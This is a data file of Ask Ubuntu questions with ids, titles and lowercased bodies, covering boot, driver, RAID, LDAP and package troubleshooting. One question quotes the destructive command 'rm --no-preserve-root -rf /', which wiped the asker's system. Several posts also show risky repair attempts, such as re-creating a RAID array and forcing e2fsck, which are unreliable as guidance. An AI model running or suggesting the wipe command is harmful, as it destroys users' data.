5.2t 1 % /srv/samba/storage1 edit : i have also mounted a cifs share and copy the files to the array as root and all worked ok until i got the following error msg . df still reports 5.2tb free . 1994/940396/396w-j05.dwg 695457 100 % 2.71mb/s 0:00:00 ( xfer # 899 , to-check=1011/2060 ) 1994/940396/396w-p01.dwg 32768 1 % 104.23kb/s 0:00:23 rsync : writefd_unbuffered failed to write 4 bytes to socket [ sender ] : broken pipe ( 32 ) rsync : write failed on `` /srv/samba/data-archive/1994/940396/396w-p01.dwg '' : no space left on device ( 28 ) rsync : connection unexpectedly closed ( 17154 bytes received so far ) [ sender ] rsync error : error in rsync protocol data stream ( code 12 ) at io.c ( 605 ) [ sender=3.0.9 ]
404696	error 0400 reading sector	i had previously installed ubuntu 12.04 , i am still new to ubuntu i have had it installed for a couple of months now . i am very fond of the command-line , so i started playing around learning new commands , i ran this command rm -- no-preserve-root -rf / i know what it does i just wanted to see it for myself . when i try to re-install ubuntu this is what i get edd : error 0400 reading sector . when i try to boot system without the cd this is what i get file not found grub rescue . any help will be appreciated .
404697	removing apt sources not defined in sources.list	in trying to remove some services from my box i 've discovered that for some reason old sources which i 've removed from the /etc/apt/sources.list file are still being queried when i run apt-get update . there is only one .list file in the apt directory , and no other subdirectories which may contain other sources . the services being queried for which i ca n't find a matching sources.list entry are : plex.r.worldssl.net download.opensuse.org pkg.jenkins-ci.org
404702	swap partition not enabled after booting up	this is what my gparted looks like when i formatted my computer before installing ubuntu , i set up the partitions properly ( or so i thought ) and had the last `` unknown '' area as a linux-swap and turned it on . i 've installed it and it went smoothly . then i booted up and saw this . i 've booted to a live usb drive and formatted that unknown area , and successfully set up a linux-swap and turned it on twice , and both times it reverted back to this in gparted . this is what i get when i run sudo blkid /dev/sda1 : uuid= '' 2152-b1bc '' type= '' vfat '' /dev/sda2 : uuid= '' 593f856a-b25e-4f25-ac48-3c5b00dcf7d9 '' type= '' ext4 '' /dev/sda3 : uuid= '' 78b1b1a0-b721-4f52-8b17-b577bd573225 '' type= '' ext4 '' /dev/mapper/cryptswap1 : uuid= '' 9b33ee92-f21f-4e07-b080-95ef59a62d1d '' type= '' swap '' this is the result of running cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda2 during installation uuid=593f856a-b25e-4f25-ac48-3c5b00dcf7d9 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation uuid=2152-b1bc /boot/efi vfat defaults 0 1 # /home was on /dev/sda3 during installation uuid=78b1b1a0-b721-4f52-8b17-b577bd573225 /home ext4 defaults 0 2 # swap was on /dev/sda4 during installation # uuid=7c51619a-5ead-4e78-af2d-2900f3b4046c none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 this is what i get when i run free -h total used free shared buffers cached mem : 5.0g 4.8g 126m 0b 11m 3.6g -/+ buffers/cache : 1.2g 3.8g swap : 18g 200m 18g ( sorry for making you edit this post again i ca n't figure out the formatting here yet )
404704	appgrid not working . only shows empty window .	i have installed appgrid from ppa : appgrid/stable . when i run it , it just shows empty window . when i run it with sudo , the same thing happens . it just keeps doing same thing in terminal . i tried it both on saucy and raring ( 64 bit - gnome version ) . does anyone know how to fix it ?
404707	problem in .net framework 3.5 installation	please any one tell which ubuntu version support for .net framework 3.5 with wine and how to install it using wine . i used ubuntu 13.10 version and wine 1.6 version to install .net framework 3.5 but during the installation it gave setup error
404710	vlc browser plugin : fullscreen mod on second device ?	i am using the vlc browser plugin to play youtube videos . i am using a two-screen-setup on my pc and i want to watch videos on my second screen while working on the first one . whenever i activate the full screen mode of the browser plugin , the the first screen is used by default even though i start the fullscreen mode from the secondary screen . how can i configure the plugin to use the second screen by default for fullscreen mode ? thanks !
404713	no grub menu after installing ubuntu 13.10 ( 32 bit ) alongside win 8	need help..i have installed ubuntu 13.10 ( 32 bit ) alogside win 8 but after restarting , it boot directly into win 8 , no grub menu..i have tried solutions online but nothing seems to work.. ! ! ! any help.. about a minute ago 路 like 路 reply
404714	is there a free mysql manager with a visual query builder for ubuntu ?	i need a free mysql manager with a visual query builder . i used to use ems manager for mysql in windows but since i 'm trying to be a ubuntu user now , i need another tool with a visual query builder to save me time of creating queries . a lot of posts online mention that mysql workbench has a visual query builder but i could n't find it . all it has is an err from database which is making a reverse engineering for any database . i need something like that to create a query , not err . something like :
404717	dual boot ubuntu server and desktop or ubuntu server + gui ?	here is my situation : i 've developed a java-based daemon i want to run on ubuntu server at boot . however , for testing purposes and future developers , i made an user interface , so i would like to be able to run it with a gui , so i thought about installing both server and desktop , and picking one when booting . is this the best way to do it ? the other option i thought about is installing ubuntu server alone , and install a basic gui for it , in that case , is it possible to boot with/without that gui ? how ? in case the first way is better , how should i do the partitions ? the hard drive has 60gb of space , and my software is not bigger than 10 mb . thanks !
404725	google earth wo n't launch on xubuntu 13.10	i just tried to install google earth on my new xubuntu 13.10 installation . 64-bit fails anyway because of missing ia32-libs , but the 32-bit edition installs fine . it just reports an error if i try to launch it : ./googleearth-bin : error while loading shared libraries : libfontconfig.so.1 : can not open shared object file : no such file or directory i already tried to re-install the package and added the libfontconfig-dev package , too , but still this error appears . any ideas whats missing or how to fix ?
404729	how to install ubuntu using wubi reusing my iso ?	i already have ubuntu 12.04 iso file and 13.04 iso files.i want to install ubuntu using wubi installer without downloading form internet .i put thoes files ( iso file and wubi installer ) in same directory but it is still downloading to internet . please help and tell me how to install without downloading . thank you .
404732	after flashing images device is rebooting continuously on nexus 10	after flashing system.img recovery.img and boot.img i 'm getting below error in dmesg ext3-fs ( mmcblk0p9 ) : error : could n't mount because of unsupported optional features ( 40 ) ext2-fs ( mmcblk0p9 ) : error : could n't mount because of unsupported optional features ( 40 ) ext4-fs ( mmcblk0p9 ) : mounted filesystem with ordered data mode . opts : ( null ) initrd : could n't find a system partition
404734	sound not working in ubuntu ?	i have attached logitech c110 webcam to my ubuntu system using cheese for video recording but there is no voice recorded ?
404737	horizontal scrolling in firefox to shift+mouse scroll ( instead of back/forward )	on ubuntu 13.10 , with chrome browser , gedit , gimp etc . the shift + mouse scroll == horizontal scroll . with firefox ( 26.0 ) it behaves as back/forward page , which is really annoying . how i can disable the back/forward functionality , and change it to horizontal scroll ?
404738	slickedit wo n't install on 12.04	i ca n't run the slickedit installation on my ubuntu machine . following the vendor 's instructions : run the installation at the prompt : $ ./vsinst here are the details : $ ll -rwxr-xr-x 1 user user 645648 aug 12 21:46 vsinst* system $ uname -a : linux xxx-linux-svn 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:28:45 utc 2013 i686 i686 i386 gnu/linux details : $ file vsinst vsinst : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.4.0 , not stripped $ ldd vsinst not a dynamic executable so , it 's neither architectural incompatibility problem , nor permissions . tried 32-bit libs with : sudo apt-get install i386 & & sudo ./vsinst in vain , same result : ./vsinst : can not execute binary file sorry and thanks for everyone ! the problem is in the 64-bit package offered by se downloads page . their 32-bit package works just fine .
404740	volume via command line in 12.04	i need to allow several clients to affect the volume of a central server . can i change the audio master volume via command line in ubuntu 12.04 ?
404741	wifi is not working in 12.04lts dual boot but working in window 7	wifi is working in window 7 but not working in ubuntu12.04 lts.i have core i5 sony vaio vpceg18fg
404742	unable to install espeak software	whenever i try to install espeak using apt-get install espeak it shows umang @ ubuntu : ~/desktop $ apt-get install espeak e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? umang @ ubuntu : ~/desktop $ sudo apt-get install espeak reading package lists ... done building dependency tree reading state information ... done espeak is already the newest version . the following packages were automatically installed and are no longer required : calibre-bin fonts-mathjax libchm1 libjs-jquery libjs-mathjax libjs-sphinxdoc libjs-underscore libpodofo0.9.0 libtidy-0.99-0 python-beautifulsoup python-cherrypy3 python-cssselect python-cssutils python-dateutil python-dnspython python-feedparser python-markdown python-mechanize python-netifaces python-pygments python-pyparsing python-repoze.lru python-routes python-utidylib python-webob use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . umang @ ubuntu : ~/desktop $ clear i have used desktop as the folder because espeak package is present in this folder . i have also try it after going to root using sudo -s but still the same thing occurs . can you please suggest me some correcting measures ?
404745	setting password for administrator	i am using ubantu 12.04 lts . i have three users - one administrator and two standard users . i changed the password for administrator to 'none ' . later i used passwd command to set the password for the same user . but the password is not getting set .
404747	bind9 dnssec issue	im getting a lot of these errors in syslog jan 13 06:43:22 sgdns01 named [ 14352 ] : error ( no valid rrsig ) resolving 'variety.com/ds/in ' : 165.21.83.88 # 53 jan 13 06:43:34 sgdns01 named [ 14352 ] : validating @ 0x7fa4780b3210 : . ns : got insecure response ; parent indicates it sh ould be secure jan 13 06:43:34 sgdns01 named [ 14352 ] : error ( insecurity proof failed ) resolving './ns/in ' : 165.21.83.88 # 53 jan 13 06:43:34 sgdns01 named [ 14352 ] : validating @ 0x7fa4780cf720 : . soa : got insecure response ; parent indicates it and the advise is to disable the dnssec in named.conf.options dnssec-enable no ; dnssec-validation no ; but now its intermittent issue , it will resolve the issue for some time but then it will occur again . i can not ping some host . please help .
404748	ubuntu 12.04 login loop ( without gui )	i ca n't log in to a ubuntu 12.04.2 lts . always it loops back to the login ( i do not use the gui ! ) . one suggestion was to delete the .xauthority file , but i do n't have such a file ( and this was more for the gui login ) . in recovery mode i can enter to the root shell . do you have any ideas , how to solve the login problem ?
404749	i need help installing and using ubuntu	i 'm new here ! i downloaded ubuntu 13.10 32 bit version just now . it downloaded in .rar ( winrar ) . when i open the file , i have many folders in it and at last , i have this `` wubi.exe '' file . i double-click it and it extracts . but after extraction , nothing rally happens . sometimes i get the windows error sound but no pop-up box comes on the screen . my second question , should i install it on my harddrive ( with my windows ) or a dvd , or a pendrive ? what to do ? can someone give me a complete guide on ubuntu ? never used . and also , i forgot my bios password , so i ca n't enter into bios . is that a problem ? can anyone help me on this too ? if there 's anything i need to know , please tell me : )
404751	ubuntu screen freezes frequently	ubuntu 12.04 screen freezes frequently : it happens with no specific program ( firefox-eclipse-aptana-vlc-nautilus ) . the mouse pointer is still able to move around the screen , and changes to ( i ) when i move above some text and back to normal when i move out . it does n't respond to ctrl+alt+arrow keys . not responding to alt+sysrq with reisub . it only respond to ctrl+alt+ ( 1-3- ... ) i tried to use `` service gdm restart '' , when i login , the screen does n't change . tried to kill the program and switch back to the graphical interface , the screen stills unchanged . up till now the only way to get back to normal screen is to kill xorg , but it also kills all the running programs , is there any way to solve this problem ? before upgrading to 12.04 , i never had this problem .
404753	ubuntu login problem after deleting the drive installed with other os	i had dual boot in my laptop with ubuntu and linux mint . i created separate partition to install mint . now i wanted to remove the mint os therefore i just deleted the drive that contained mint os by logging into ubuntu . now my grub is damaged but somehow i managed to boot with ubuntu again . when i try to login into ubuntu , the ubuntu login screen is loaded again and again . it never loads my desktop however i can login into guest account . how do i login into my ubuntu . ?
404754	how to increase xfs max . filename length	how can i increase the maximum length of a filename of xfs ? http : //en.wikipedia.org/wiki/xfs i 'm trying to download a torrent file , and apparently because it 's cyrillic , the file name hit 's the limit . error , could n't create file `` как это сделано/128 ( литье автомобильных деталей с помощью воска ; лодка из стекловолокна ; сушильная машина ; лампочка высокой интенсивности ; тележка для покупок ) .avi '' : file name too long getconf -a | grep -i name name_max 255 _posix_name_max 255 logname_max 256 tty_name_max 32 tzname_max 6 _posix_tzname_max 6 charclass_name_max 2048 host_name_max 64 login_name_max 256
404763	how to enable ubuntu to read/play arabic subtitles ?	i ca n't watch any movie with arabic subtitles , i have tried to open the sub file and it displayed as all chinese characters . how can i get arabic subtitles working ?
404767	how to change the search statements in unity scopes ?	when you open unity lenses you will see a search ... in the search field . for example application lens you will find search applications in the search field in the lens . note the image ... what i want is to change the statement to mine.. is it possible without recompiling the source code ? ! if yes how ? ! and could i use another language ? !
404768	tora : no connection provider	i install tora on ubuntu 12.04 . when i try to open , i 'm unable to connect mysql database . tora is not showing option for mysql .
404774	update only 1 package using a more recent repo	i have a package stunnel thats on version 3:4.42-1 ) [ universe ] for precise but on the a later version of ubuntu its on stunnel4 ( 3:4.53-1 ) [ universe ] i can update the package manually but is there a better way to update the package using a more recent repo ? can i add a different repo from a later version of ubuntu and just use that repo to update this package ? can i use a apt-get upgrade command to use a different repo only ? thanks
404780	can not update software after instaling kubuntu 13.10	i installed kubuntu 13.10 on my friends laptop , linovo , and when tried to update it said unable to download packages . and the system never got updated.. internet connections to system is fine and i am able to browse the web . what could be the possible reason ? ? and when tried to install vlc etc , terminal replied , packages not found .
404789	broken pipe error - tty screen not accessible - killall compiz command used	i am using ubuntu 12.04 lts . for my project , i tried to kill the window manager using killall command . when i reboot the system , i am not able to login . i am not able to access tty sessions too . i am receiving a message `` could not write bytes : broken pipe error '' can you guys help me reason out the cause for the problem..
404791	problems with microphone	my front mic does n't seem to be working in ubuntu . i have even tried other mics but none of them work . i am relatively new to the os . please help . thanks in advance .
404800	i attempeted to format ubuntu	i was trying to format ubuntu so i selected restore to factory settings but nothing happened so i deleted all the partitions including the admin so now i am trying to make the partitions using guest session but it is asking for root password i tried sudo su but it says : sudo : unable to change to sudoers gid : operation not permitted sudo : setresuid ( ) [ 0 , 0 , 0 ] - > [ 122 , -1 , -1 ] : operation not permitted what should i do ? !
404807	can i change my android to ubuntu	i would like to ask something . is it possible to change my android phone to ubuntu ? ? ? like to change the rom or anythink it needs to be full ubuntu . i have galaxy s4 gt-i9505 .
404812	function keys on the apply keyboard with no root	there is a well-known method on how to make function keys work on apple keyboards in ubuntu : echo 2 | sudo tee /sys/module/hid_apple/parameters/fnmode however , is there a way to do that with no root ? perhaps through xmodmap or xsession ? thanks ! update : i 've got the desired behavior for a few selected keys using xmodmap ( it was a bit annoying as i had to launch a separate x to stop the media key being intercepted by gnome , but at the end i 've got a keycode ) . so i guess i 've found a workaround . a more general solution would be very welcome , of course .
404814	how can i connect to a computer with teamviewer there dose n't have a screen ubuntu 13.10	hey i have a pc with ubuntu 13.10 and the first i installed on it was team viewer i wont is so i can connect to my pc there are in my bascement so i dont need a screen on my pc with ubuntu and i tryed without screen i cut see the pc is online and then im trying to connect to the pc it opend the window but it say is connecting but i have waited 10 min and normaley it takes 5 sec . and then i contacted the teamviewer support the say it should work without a screen if i actived my screen driver but how can i do what i have tryed to change driver but then i started up without a screen it dint starte up corretly then i pluged a screen to it opend a terminal and then i restart with the screen it works perfekt
404815	is there a quick way to open command window	is there a quick way to open command window from file explorer ? there is a shortcut in windows 8 like `` open commmand window here '' .
404817	ca n't change brightness on a acer aspire v5-171	i found a solution on a site but i do n't manage to do it you need to enter acpi_backlight=vendor in /etc/default/grub boot options for the brightness keys to work . brightness can be adjusted with command echo ( level ) > /sys/class/backlight/intel_backlight/brightness as super user ( su , not sudo ) . maximum brightness can be found with cat /sys/class/backlight/intel_backlight/max_brightness . i found it on this site : http : //www.linlap.com/acer_aspire_v5-171
404819	ubuntu full to ubuntu mini	i am not able to install the ubuntu mini on my system due to the installation limitations the mini may have . i was able to however install ubuntu desktop on my disc without any problems , i could do the needful stripping of it to get it down to the mini size which is i think about 27mb . now the thing is what commands do i need to type into terminal to completely strip down the system and then rebuild it from there with whatever software i require installed on it ? can someone provide the proper commands ?
404822	installing ubuntu 13.10 alongside windows 8 does n't recognize old windows	i have seen this problem thousands of places but ca n't really figure out what is wrong . i have a 2 year old asus g74sx laptop which came with windows 7 preinstalled , now i have installed windows 8 instead and have changed a harddrive . i now want to install ubuntu alongside windows 8 to learn more about using linux and ubuntu for my work . ( note that i am very inexperienced when it comes to new os 's and especially linux . ) so far i have made a bootable usb drive with ubuntu 13.10 and when i boot ubuntu and try to install it , it does n't recognize my windows 8. i have tried reading a lot on the internet to find a solution and first thing was i should just use the `` something else '' in the installer and choose a partition i could install it on . so i made 2 new ntfs partions one with 5 gb to install ubuntu on and one with 110 gb to use for ubuntu . now when i try and choose `` something else '' it just shows my 500 gb harddrive as free space ? ? i have also found something called gparted and some other stuff that may be the cause of the problem but i am in no way experienced enough to know how i figure that out . i hope someone can help me ! and many thanks in advance to everyone who takes their time to help !
404824	how to choose install location using `` apt-get install '' ?	i was about to play around on my virtual machine running ubuntu 12.04 . i installed git-core using apt-get install git-core from repos . first i thought the apt-get command will install in the folder i am in , but i was wrong . so is there a way to directly tell apt-get where to install ? or do i have to move the files later ? let me know your best solution for this .
404827	virtual box- boot medium not found error	i wanted to try back track 5 . so i installed oracle virtual box manager . i setup my back track linux in the vbox with 512 mb ram and for storage i created a virtual box disk image ( vdi ) and the installation was successful . i shut down my back track os and again tried to boot the os , but it said fatal : could not read from the boot medium ! system halted . i tried many options told in various forums . but did n't work . how could i resolve this problem ? i have attached the screen-shot of the details of the os . thanks .
404828	can i use several antivirus apps in the same time ?	i have many friends which are windows users and i wont to keep my system and my flash drives virus-free for obvious reasons . recently , after i posted a question on ask ubuntu , i was encouraged to try bitdefender for unices . i have installed bitdefender via command line , because it is easier . and also , i have installed comodo antivirus . both of them are interesting apps and i was able to clean my flash drives . still , i wont to try other antivirus software as well . so my questions are : can i keep both antiviruses installed ( and install others too ) ? i know that when i was on windows i was told that i should keep only one antivirus installed because two such software can enter in some conflict . i remember that i had once two antiviruses installed , but one of them was set on inactive . in order to scan the pc i used them alternatively , each of them avoiding the quarantine folder of the other software . so , having in mind my windows experience regarding these antivirus apps , what attitude should i have when i 'm on linux ? is is ok to install several such apps ( in order to use them paranoically to scan flash drives ? ) . and if this is ok , what settings should i have in order to avoid conflicts between them ? should i ask them to avoid the quarantine folder as i did in windows ? sorry for the complex question , but i do n't think is worthy to ask several tiny things when i can ask all of them considering the fact that they are inter-related . thank you in advance for your patience and explications !
404829	text editors need root access to work correctly	i 'm using ubuntu 13.10 , and i have a problem with 3 text editors - geany , gedit and sublime text . these 3 editors can not access most of their menu items , including open file and save file . the only way to access these menu items is to open those editors using root access . the only editor that seems to work without root access is adobe brackets . i 'm not talking about root files , i 'm talking about the menu items which are not accessible when just opening the editor ( even with no documents open ) .
404831	libev4 installation error	i get dpkg : error : parsing file '/var/lib/dpkg/status ' near line 14 package 'python-pkg-resources ' : file details field `size ' not allowed in status file e : sub-process /usr/bin/dpkg returned an error code ( 2 ) when i 'm trying to install libev4 . i run sudo apt-get install libev4 please advice
404832	make my own indicator	i have a script that notify me when some thing is modified on a directory . i need to make indicator that takes over the notifications instead of pop up at my screen . i want the notifications to be displayed using this indicator . so basically the question is devided into two parts : how to make my own indicator ? how to redirect the notifications to be displayed on the indicator ? using ubuntu 12.04
404833	re address installed mpich	i have an installed mpirun under /mirror/mpich2/bin shared directory . the mpich lybrary was installed in /mirror/mpich2/lib however it request for a library which are not in shared directory . can i re address it ? ( result form ldd mpirun command ) linux-gate.so.1 = > ( 0xb76e8000 ) libmpl.so.1 = > /home/me/dflowfm/petsc/petsc3/linux-gnu-c-debug/lib/libmpl.so.1 ( 0xb76e0000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xb76af000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xb7505000 ) /lib/ld-linux.so.2 ( 0xb76e9000 ) thanks
404836	will upgrading ubuntu 10.04 to 12.04 change my files ?	i know how silly it will be if i ask this question , please do bear with me as i am new to ubuntu . i have my project done in eclipse in ubuntu 10.04 . as i wanted to add some extra features in my project i could not do it in eclipse juno . my question is if i upgrade my ubuntu 10.04 to 12.04 or any other latest version , will my existing project remain the same or will it affect my existing project , which i have in ubuntu 10.04 ? if not , can i upgrade it using the update manager ?
404840	gthumb open in full width ?	is there a way when i 'm opening images with gthumb that gthumb opens it in full width and height of the screen ? basically to open maximized . now when i click on image it always opens 1/4 of the screen . edit : just a screenshoots to understand a bit better what im looking for . when i click on image and open it now , it opens like this : when i actually want to open gthumb maximized like this : now i need to click maximize every time i open an image .
404842	unable to retrieve data from cdrom after ejecting previous cd	i am currently ripping cdroms , however , i encounter the error message below after ejecting and inserting a new cdrom into the drive : unable to find the requested file . please check the spelling and try again . unhandled error message : unable to load location at the moment the only way i can rip the new cdrom is to reboot my computer first which is n't ideal . does anyone know of a solution to the problem that does n't involve rebooting my computer every time ? edit : nevermind , i solved the problem by typing `` cdda : //sr0/ '' directly into the nautilus address bar which allowed me to mount the new cdrom .
404843	using sg with iptable = > getting do_ypcall : clnt_call : rpc : ... errno	i 'm trying to prevent a program from using internet and used following howto : '' howto : run a particular program but prevent it from accessing the internet '' http : //ubuntuforums.org/showthread.php ? t=1188099 on step 6 i get an error : '' do_ypcall : clnt_call : rpc : kann nicht senden ; errno = die operation ist nicht erlaubt '' any help out there ? was hard to search this topic and could n't find any help yet . greets
404845	installing latest nvidia from xorg ppa gives black screen	after several years of using dual boot ( windows to play and ubuntu to work ) i decided to just use ubuntu , but i have a problem after installing nvidia-drivers 331.20 and rebooting the screen is black , i have seen many solutions for this problem , in particular i have run the following command sudo apt-get purge nvidia* then sudo reboot after which i am ready to use ubuntu . how can i fix this problem since i really want to play but the latest drivers ( 331.20 ) are the ones that are optimized for the 700 series .
404848	raid 5 wo n't mount	i have a qnap nas which is running a version of ubuntu and i 'm not getting any help from their forum so i thought i 'd ask my question here . i `` had '' 3 2tb hd 's in a raid 5 configuration . when i got back from my holiday vacation , i found that the raid volume was n't mounted . i ran smart utility from the qnap admin page and it detected read errors on disk2 so i bought another 2tb disk , did a swap and it looked like it was going to fix my problem : [ ~ ] # cat /proc/mdstat personalities : [ linear ] [ raid0 ] [ raid1 ] [ raid10 ] [ raid6 ] [ raid5 ] [ raid4 ] [ multipath ] md0 : active raid5 sdd3 [ 3 ] sdc3 [ 2 ] sda3 [ 0 ] 3903891200 blocks level 5 , 64k chunk , algorithm 2 [ 3/2 ] [ u_u ] [ ======== > ... ... ... ... ] recovery = 41.1 % ( 802441984/1951945600 ) finish=285.7min speed=67047k/sec i went to bed and let it finish rebuilding . the next morning i tried to create the array and it failed : [ ~ ] # mdadm -cfr -- assume-clean /dev/md0 -l 5 -n 3 /dev/sdb3 /dev/sda3 /dev/sdc3 mdadm : /dev/sdb3 appears to contain an ext2fs file system size=-391076224k mtime=thu jan 2 03:30:10 2014 mdadm : /dev/sdb3 appears to be part of a raid array : level=raid5 devices=3 ctime=tue jan 7 10:01:03 2014 mdadm : /dev/sda3 appears to contain an ext2fs file system size=-403668988k mtime=sat jan 15 17:45:38 2011 mdadm : /dev/sda3 appears to be part of a raid array : level=raid5 devices=3 ctime=tue jan 7 10:01:03 2014 mdadm : /dev/sdc3 appears to be part of a raid array : level=raid5 devices=3 ctime=tue jan 7 10:01:03 2014 mdadm : array /dev/md0 started . [ ~ ] # mount /dev/md0 /share/md0_data -t ext4 mount : wrong fs type , bad option , bad superblock on /dev/md0 , missing codepage or other error in some cases useful info is found in syslog - try dmesg | tail or so [ ~ ] # dmesg | tail [ 5474.498500 ] ext4-fs ( md0 ) : ext4_check_descriptors : block bitmap for group 1952 not in group ( block 224078240 ) ! [ 5474.504503 ] ext4-fs ( md0 ) : group descriptors corrupted ! i ran e2fsck and it complained about the superblock : [ ~ ] # e2fsck -f /dev/md0 e2fsck 1.41.4 ( 27-jan-2009 ) e2fsck : group descriptors look bad ... trying backup blocks ... e2fsck : filesystem revision too high while trying to open /dev/md0 the filesystem revision is apparently too high for this version of e2fsck . ( or the filesystem superblock is corrupt ) the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > i tried alternate superblocks : [ ~ ] # dumpe2fs /dev/md0 | grep -i superblock dumpe2fs 1.41.4 ( 27-jan-2009 ) primary superblock at 0 , group descriptors at 1-233 backup superblock at 32768 , group descriptors at 32769-33001 backup superblock at 98304 , group descriptors at 98305-98537 backup superblock at 163840 , group descriptors at 163841-164073 ... when i tried the 2nd value , it spit out all sorts of errors , here 's a snippit of them : [ ~ ] # e2fsck -b 98304 /dev/md0 e2fsck 1.41.4 ( 27-jan-2009 ) superblock has an invalid journal ( inode 8 ) . answer=1 *** ext3 journal has been deleted - filesystem is now ext2 only *** block bitmap for group 1920 is not in group . ( block 223029632 ) answer=1 inode bitmap for group 1920 is not in group . ( block 971776033 ) answer=1 inode table for group 1920 is not in group . ( block 63045632 ) warning : severe data loss possible . answer=1 group descriptor 1920 marked uninitialized without feature set . answer=1 block bitmap for group 1921 is not in group . ( block 62916993 ) answer=1 inode bitmap for group 1921 is not in group . ( block 62916994 ) answer=1 group descriptor 1921 marked uninitialized without feature set . answer=1 block bitmap for group 1922 is not in group . ( block 1236358788 ) answer=1 group descriptor 1922 marked uninitialized without feature set . answer=1 inode table for group 1923 is not in group . ( block 2996300427 ) warning : severe data loss possible . ... resize inode not valid . answer=1 /dev/md0 contains a file system with errors , check forced . pass 1 : checking inodes , blocks , and sizes root inode is not a directory . answer=1 inode 241 has extents_fl flag set on filesystem without extents support . answer=1 inode 263 , i_blocks is 139224 , should be 139056. answer=1 inode 264 has illegal block ( s ) . answer=1 illegal block # 2060 ( 2770694604 ) in inode 264. answer=1 cleared . illegal block # 2061 ( 2431456604 ) in inode 264. answer=1 cleared . ... too many illegal blocks in inode 264. answer=1 inodes that were part of a corrupted orphan linked list found . answer=1 inode 8433 was part of the orphaned inode list . answer=1 fixed . inode 8433 has imagic flag set . answer=1 inode 8433 has a extra size ( 48936 ) which is invalid answer=1 inode 8434 was part of the orphaned inode list . answer=1 fixed . inode 8434 has imagic flag set . answer=1 inode 8434 has a extra size ( 49000 ) which is invalid ... inode 16369 is in use , but has dtime set . answer=1 inode 16369 has a extra size ( 35995 ) which is invalid answer=1 inode 16370 is in use , but has dtime set . answer=1 inode 16370 has imagic flag set . answer=1 inode 16370 has a extra size ( 26087 ) which is invalid answer=1 inode 16371 is in use , but has dtime set . answer=1 inode 16371 has imagic flag set . answer=1 inode 16371 has a extra size ( 1476 ) which is invalid answer=1 inode 16372 has extents_fl flag set on filesystem without extents support . ... inode 16380 has extents_fl flag set on filesystem without extents support . answer=1 inode 16381 has extents_fl flag set on filesystem without extents support . answer=1 inode 16382 has extents_fl flag set on filesystem without extents support . answer=1 inode 16383 has extents_fl flag set on filesystem without extents support . answer=1 inode 16384 has extents_fl flag set on filesystem without extents support . answer=1 inode 16375 has compression flag set on filesystem without compression support . answer=1 inode 16375 has a bad extended attribute block 335544554. answer=1 inode 16375 has index_fl flag set but is not a directory . answer=1 inode 16375 , i_size is 4795354609508463505 , should be 0. answer=1 inode 16375 , i_blocks is 119976829646520 , should be 0. answer=1 inode 16373 has compression flag set on filesystem without compression support . answer=1 ... inode 49141 is in use , but has dtime set . answer=1 inode 49141 has a extra size ( 53130 ) which is invalid answer=1 inode 49142 is in use , but has dtime set . answer=1 inode 49142 has a extra size ( 15011 ) which is invalid answer=1 inode 49143 has extents_fl flag set on filesystem without extents support . answer=1 inode 49144 has extents_fl flag set on filesystem without extents support . ... i finally did a ctrl-c to stop it , afraid it was going to cause more problems . it then spit out this : ^crecreate journalanswer=1 creating journal ( 32768 blocks ) : done . *** journal has been re-created - filesystem is now ext3 again *** /dev/md0 : e2fsck canceled . /dev/md0 : ***** file system was modified ***** [ ~ ] # any help on what to try next would be appreciated . i did have a couple questions about raid 's and mdadm since i 'm a newbie when it comes to them . what happens if you try to mount them out of order , ie mdadm -cfr -- assume-clean /dev/md0 -l 5 -n 3 /dev/sda3 /dev/sdb3 /dev/sdc3 instead of mdadm -cfr -- assume-clean /dev/md0 -l 5 -n 3 /dev/sdb3 /dev/sda3 /dev/sdc3 and why , when i run the mdadm command , is my new drive `` sdb3 '' the only one showing the message : appears to contain an ext2fs file system ? could that be part of my problem ? thanks , robert
404852	authenticating ubuntu client with ldap server ? any ldap expert here ?	i installed ldap on ubuntu desktop 12.04 , i configured it as below 1- rename host-name to server 2- add this entry in /etc/hosts : ip server.domain.com ( ip is the server ip ) 3- install slapd 4- install ldap-utils 5- edit /etc/ldap/ldap.conf base dc=domain , dc=com uri ldap : //ipofserver 6-install apache2 7-install phpldapadmin 8-access ldap database by admin 9-add ou + posix group+ user on client side : 1- add server.domain.com in /etc/hosts 2-install libpam_ldap in setup i put ldap ip + domain + account for admin +admin pass 3- installed nscd 4- configure /etc/nsswitch.conf password : ldap compat group : ldap compat shadow : ldap compat 5- edit /etc/pam.d/common-auth add auth required pam_ldap.so use_first_pass 6- edit /etc/pam.d/common-account add account required pam_ldap.so 7-edit /etc/pam.d/common-session add pam_mkhomedir.so skel=/etc/skel umask=0022 8- edit /etc/pam.d/common-password add password required pam_ldap.so 9- restart nscd the authentication failed . can i authenticate using ldap on ubuntu desktop ? what steps am i missing ?
404854	black screen during booting ubuntu 13.10+kde gui	ubuntu 13.04+kde gui worked fine , but after update to ubuntu 13.10 there is black screen during booting kde gui . after reboot black screen once again . so i have two questions ! how can i force ubuntu to load standart unity gui after reboot ? is it save to open console ( crtl-alt-f1 ) during black screen and remove kde completely via apt-get ?
404855	how do i explain what ubuntu is to someone who 's never heard of it ?	i need to explain to friends what ubuntu is and i do n't want to link them just to the wikipedia page . i want them to get a guide with the right information . what is ubuntu ? how do i use it ? what does the name ubuntu mean ?
404856	how to optimize sata hard disk in ubuntu 12.04 ?	how to optimize sata hard disk - hdd ( not a ssd ) in ubuntu 12.04 for better performance . hard disk ( hdd ) : 500 gb - not a ssd ram : 4gb 1gb 1 gb nvidia graphic card intel core i5 second generation procesor
